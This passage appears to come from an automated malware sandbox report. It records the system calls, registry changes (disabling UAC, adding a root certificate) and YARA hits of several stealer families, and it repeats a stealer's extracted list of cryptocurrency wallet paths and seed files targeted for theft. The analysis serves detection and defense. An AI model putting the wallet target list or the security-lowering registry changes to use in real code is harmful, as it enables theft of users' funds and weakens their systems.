                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_004026C4 GetSystemTime,12_2_004026C4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045559C GetUserNameA,14_2_0045559C
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,17_2_004144B0
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_00405CF4 GetVersionExA,12_2_00405CF4
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Disables UAC (registry)
                        Source: C:\Users\user\Desktop\file.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Yara detected Mars stealer
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Yara detected Socks5Systemz
                        Source: Yara matchFile source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: weblinkanalyzer.exe PID: 7312, type: MEMORYSTR
                        Yara detected Stealc
                        Source: Yara matchFile source: 00000011.00000002.3182663739.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Yara detected Vidar stealer
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.syncUpd.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.syncUpd.exe.6a0e67.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000003.2098832064.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 44208, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: syncUpd.exe, 00000011.00000002.3283292607.0000000026EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\*.*~
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: syncUpd.exe, 00000011.00000002.3179683350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 